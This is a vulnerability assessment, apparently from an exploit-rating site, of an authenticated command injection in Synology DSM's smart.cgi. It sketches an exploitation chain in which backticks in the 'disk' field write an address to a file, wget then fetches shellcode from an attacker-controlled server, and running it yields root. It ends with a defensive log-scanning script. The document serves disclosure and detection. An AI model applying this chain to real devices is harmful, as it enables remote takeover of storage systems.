Attacker Value
Very High


Disclosure Date: December 04, 2017


(1 user assessed) Low


Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via the disk field.


Technical Analysis

AUTHENTICATED command execution in webman/modules/StorageManager/smart.cgi through either a GET or POST request.
Variables for the request look as such:

        'action' => 'apply',
        'operation' => 'quick',
        'disk' => "/dev/sda"

The disk field is vulnerable. However, that’s just where this fun begins. The disk field is required to be ‘semi’ disk correct, AKA you can’t just have nothing there, or a; however, /dev/sd did seem to work. Next, when the command is passed off, the entire disk field is limited to 30 characters. After shortening to /dev/sd and then adding ticks (‘`’) you are left with 22 characters. Pretty tight spacing.

To circumvent this restriction, the following was done:

  1. in < 22 characters, echo -n and ip:port to a file (/a).
  2. use wget -i /a -O <file> to then pull back shellcode from an attacker-controlled HTTP server
  3. execute the payload

Most likely step 1 will need to be done in > 1 steps.

Exploitation grants root privileges.
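
For defenders, the following added example (not part of the original assessment and not Synology code) flags smart.cgi requests whose disk parameter is anything other than a plain device path. The allowlist pattern, the access-log layout and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate values are plain SCSI/SATA device paths such as /dev/sda.
DISK_OK = re.compile(r"/dev/sd[a-z]{1,2}")
MAX_DISK_LEN = 30  # length limit on the disk field noted in the write-up

def disk_is_valid(value):
    """Strict allowlist: the whole value must be a device path, not just a prefix."""
    return len(value) <= MAX_DISK_LEN and DISK_OK.fullmatch(value) is not None

def suspicious_requests(log_lines):
    """Return (client, disk) pairs for smart.cgi requests with a non-allowlisted disk."""
    hits = []
    for line in log_lines:
        m = re.match(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"', line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/StorageManager/smart.cgi"):
            continue
        # parse_qs percent-decodes values, so encoded metacharacters are caught too.
        for disk in parse_qs(url.query, keep_blank_values=True).get("disk", []):
            if not disk_is_valid(disk):
                hits.append((client, disk))
    return hits

# Constructed sample access-log lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - admin [04/Dec/2017:10:00:00 +0000] "GET /webman/modules/StorageManager/'
    'smart.cgi?action=apply&operation=quick&disk=%2Fdev%2Fsda HTTP/1.1" 200 51',
    '192.0.2.66 - admin [04/Dec/2017:10:05:00 +0000] "GET /webman/modules/StorageManager/'
    'smart.cgi?action=apply&operation=quick&disk=%2Fdev%2Fsd%60true%60 HTTP/1.1" 200 51',
    '192.0.2.10 - admin [04/Dec/2017:10:06:00 +0000] "GET /webman/index.cgi HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, disk in suspicious_requests(SAMPLE_LOG):
        print(f"ALERT {client} disk={disk!r}")
```

This only sees parameters sent in the query string; since the endpoint also accepts POST, request-body logging is needed to cover that path.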
